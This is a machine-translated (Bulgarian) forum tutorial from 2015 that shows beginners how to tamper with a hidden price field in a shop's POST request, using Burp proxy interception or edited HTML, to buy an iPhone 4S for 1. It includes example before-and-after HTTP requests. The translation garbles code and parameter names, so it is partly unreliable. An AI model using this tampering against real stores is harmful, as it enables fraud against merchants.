Тази статия е огледална статия за машинен превод, моля, кликнете тук, за да преминете към оригиналната статия.

Architect_Programmer_Code Селскостопанска мрежа»Архитект Други технологии Безопасно нападение и защита Проникване на проникване: Приложение на HTTP заглавия
Изглед: 12586|Отговор: 0

[Урок по безопасност] Проникване на проникване: Приложение на HTTP заглавия

[Копирай линк]
Публикувано в 7.02.2015 г. 17:59:07 ч. | | |

За приложението на HTTP хедърите

HTTP хедърът често се използва в механизма за предаване на уебсайтове, но повечето начинаещи в Китай не са забелязали този елемент, тази статия е посветена само на начинаещи, ролята на HTTP хедъра в процеса на проникване.

Вземете страницата за пазаруване като пример, за да анализирате малка част от ролята на HTTP хедърите.

Първо, нека анализираме формуляр на страницата за пазаруване.

<form method="post" action="shop.php?id=1">

prodct: iphone 4s <br />

price:2400 <br />  <!--注意此行代码-->

Quantity: <input type="text" name="gouwu"> (Maximum gouwu is 50) <br />

<тип вход="скрито" име = "цена" стойност="449">

<input type="submit" value="Buy">

</form>

По време на отварянето направете скрийншот на заглавието му в http съобщението и го разгледайте

POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

количество=1&цена=2400

Въпреки че полето за цена не се показва на страницата при отваряне на страницата за пазаруване, то все пак може да бъде редактирано и управлявано от потребителя.

Има два начина за постигане на монтаж

1. Запазете HTML изходния код за модификация и след това го презаредете в браузъра, за да се стартира

2. Използване на прокси прихващане за модифициране на HTTP заглавия (конструкция на прокси в инструмент burp)

Вземете HTTP заглавието по-горе за пример
Преди промяната
POST /shop/2/shop.php?id=1 HTTP/1.1                  
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

количество=1&цена=2400

След промяната
POST /shop/2/shop.php?id=1 HTTP/1.1
Host: shop.net
Content-Type: application/x-www/form-urlencoded
Content-Length: 20

количества=1&цена=1


В последния ред цената на полето има стойност 2400 и ако я променим на 1, можем да вземем iPhone 4S на по-ниска цена.

Тази статия дава само представа за неочаквани подобрения като инжекция на LDAP.




Предишен:Метод за изпълнение на паролата за възстановяване на MySQL забравена парола
Следващ:SQL инжекция за получаване на пълния път на уебсайта

Свързани публикации
Отричане:
Целият софтуер, програмни материали или статии, публикувани от Code Farmer Network, са само за учебни и изследователски цели; Горното съдържание не трябва да се използва за търговски или незаконни цели, в противен случай потребителите ще понесат всички последствия. Информацията на този сайт идва от интернет, а споровете за авторски права нямат нищо общо с този сайт. Трябва напълно да изтриете горното съдържание от компютъра си в рамките на 24 часа след изтеглянето. Ако ви харесва програмата, моля, подкрепете оригинален софтуер, купете регистрация и получете по-добри услуги. Ако има нарушение, моля, свържете се с нас по имейл.
Mail To:help@itsvse.com